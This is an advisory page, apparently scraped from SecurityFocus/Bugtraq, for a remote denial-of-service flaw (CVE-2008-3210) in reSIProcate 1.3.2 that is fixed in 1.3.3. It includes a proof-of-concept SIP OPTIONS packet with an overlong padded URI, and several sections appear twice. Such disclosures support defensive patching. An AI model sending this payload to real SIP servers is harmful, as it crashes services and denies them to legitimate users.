ReSIProcate INVITE and OPTIONS Messages DNS Resolver Remote Denial of Service Vulnerability
BID:30194
Info
ReSIProcate INVITE and OPTIONS Messages DNS Resolver Remote Denial of Service Vulnerability
| Bugtraq ID: | 30194 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2008-3210 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 03 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | Mu Dynamics research team |
| Vulnerable: |
ReSIProcate ReSIProcate 1.3.2 |
| Not Vulnerable: |
ReSIProcate ReSIProcate 1.3.3 |
Discussion
ReSIProcate INVITE and OPTIONS Messages DNS Resolver Remote Denial of Service Vulnerability
ReSIProcate is prone to a remote denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied URIs.
Attackers can leverage this issue to crash the application and deny service to legitimate users. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.
Versions prior to ReSIProcate 1.3.3 are vulnerable.
ReSIProcate is prone to a remote denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied URIs.
Attackers can leverage this issue to crash the application and deny service to legitimate users. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.
Versions prior to ReSIProcate 1.3.3 are vulnerable.
Exploit / POC
ReSIProcate INVITE and OPTIONS Messages DNS Resolver Remote Denial of Service Vulnerability
The following example packet is available:
OPTIONS sip:bob@example.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:54422;branch=z9hG4bKZqPsHMEiem;rport
To: "Bob" <sip:[email protected]>
From: "Alice" <sip:[email protected]>;tag=W4eHvLYEQX
Call-ID: [email protected]
CSeq: 1 OPTIONS
Contact: <sip:[email protected]:54422>
Max-Forwards: 70
Content-Length: 0
The following example packet is available:
OPTIONS sip:bob@example.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:54422;branch=z9hG4bKZqPsHMEiem;rport
To: "Bob" <sip:[email protected]>
From: "Alice" <sip:[email protected]>;tag=W4eHvLYEQX
Call-ID: [email protected]
CSeq: 1 OPTIONS
Contact: <sip:[email protected]:54422>
Max-Forwards: 70
Content-Length: 0
Solution / Fix
ReSIProcate INVITE and OPTIONS Messages DNS Resolver Remote Denial of Service Vulnerability
Solution:
The vendor released has ReSIProcate 1.3.3. Please see the references for more information.
ReSIProcate ReSIProcate 1.3.2
Solution:
The vendor released has ReSIProcate 1.3.3. Please see the references for more information.
ReSIProcate ReSIProcate 1.3.2
-
ReSIProcate resiprocate-1.3.3.tar.gz
https://www.resiprocate.org/files/pub/reSIProcate/releases/resiprocate -1.3.3.tar.gz
References
ReSIProcate INVITE and OPTIONS Messages DNS Resolver Remote Denial of Service Vulnerability
References:
References:
- ReSIProcate 1.3.3 Release (ReSIProcate)
- Vendor Homepage (ReSIProcate)